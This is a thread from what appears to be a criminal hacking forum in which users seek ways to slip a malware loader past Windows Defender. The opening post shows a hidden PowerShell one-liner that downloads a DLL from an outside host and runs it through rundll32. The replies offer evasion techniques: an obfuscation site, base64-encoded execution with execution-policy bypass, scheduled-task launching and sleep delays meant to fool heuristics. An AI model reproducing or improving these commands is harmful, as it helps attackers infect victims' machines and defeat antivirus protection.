• XSS.stack #1 – первый литературный журнал от юзеров форума

Trojan:Win32/Commandrob.A!ml какие есть идеи по обходу?

Отслеживать
Matanbuchus

Matanbuchus

Princeps huius mundi
Premium
Регистрация
29.12.2018
Сообщения
504
Решения
1
Реакции
160
Гарант сделки
2
При выполнении через WIN+R команды вида
Bash: 
powershell -w hidden -c "$f=$env:ProgramData+'\'+[guid]::NewGuid()+'.tmp';iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f;rundll32.exe `"$f`",DllRegisterServer"
получаю от windef детект Trojan:Win32/Commandrob.A!ml попытка обфускации команды например через разбитие rundll32 на части ('run'+'dll32') не помогает.
 
Matanbuchus сказал(а):
При выполнении через WIN+R команды вида
Bash: 
powershell -w hidden -c "$f=$env:ProgramData+'\'+[guid]::NewGuid()+'.tmp';iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f;rundll32.exe `"$f`",DllRegisterServer"
получаю от windef детект Trojan:Win32/Commandrob.A!ml попытка обфускации команды например через разбитие rundll32 на части ('run'+'dll32') не помогает.
Попробуй обфусцировать здесь - https://argfuscator.net
 
nstead of -w hidden, use a less suspicious execution method. For example, run PowerShell from a scheduled task or a batch file to avoid the blatant “hidden” flag.

Simple concatenation ('run'+'dll32') isn't enough. Use base64 encoding to hide the entire command, then decode and execute it:
$f = "$env:ProgramData\$([guid]::NewGuid()).tmp"
iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f
Start-Sleep -Seconds 5 # Delay to confuse heuristics
Start-Process "rundll32.exe" -ArgumentList ""$f",DllRegisterServer" -WindowStyle Hidden
Output might look like: JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAdQBpAGQAKAApACsAJwAuAHQAbQBwACcAOwBpAHcAcgAgACcAaAB0AHQAcABzAD
Etc

runit
powershell -ep bypass -enc JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAd
 
CryptNeeded сказал(а):
nstead of -w hidden, use a less suspicious execution method. For example, run PowerShell from a scheduled task or a batch file to avoid the blatant “hidden” flag.

Simple concatenation ('run'+'dll32') isn't enough. Use base64 encoding to hide the entire command, then decode and execute it:
$f = "$env:ProgramData\$([guid]::NewGuid()).tmp"
iwr 'https://com.com/dll.aspx' -UseBasicParsing -OutFile $f
Start-Sleep -Seconds 5 # Delay to confuse heuristics
Start-Process "rundll32.exe" -ArgumentList ""$f",DllRegisterServer" -WindowStyle Hidden
Output might look like: JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAdQBpAGQAKAApACsAJwAuAHQAbQBwACcAOwBpAHcAcgAgACcAaAB0AHQAcABzAD
Etc

runit
powershell -ep bypass -enc JABmAD0AJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXAAnACsAWwBnAHUAaQBkAF0AOgA6AE4AZQB3AEcAd
Hi, what is the solution under the start-process script? WD kills start-process in the script, i.e. to start a file. Obfuscation of the script does not help(
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх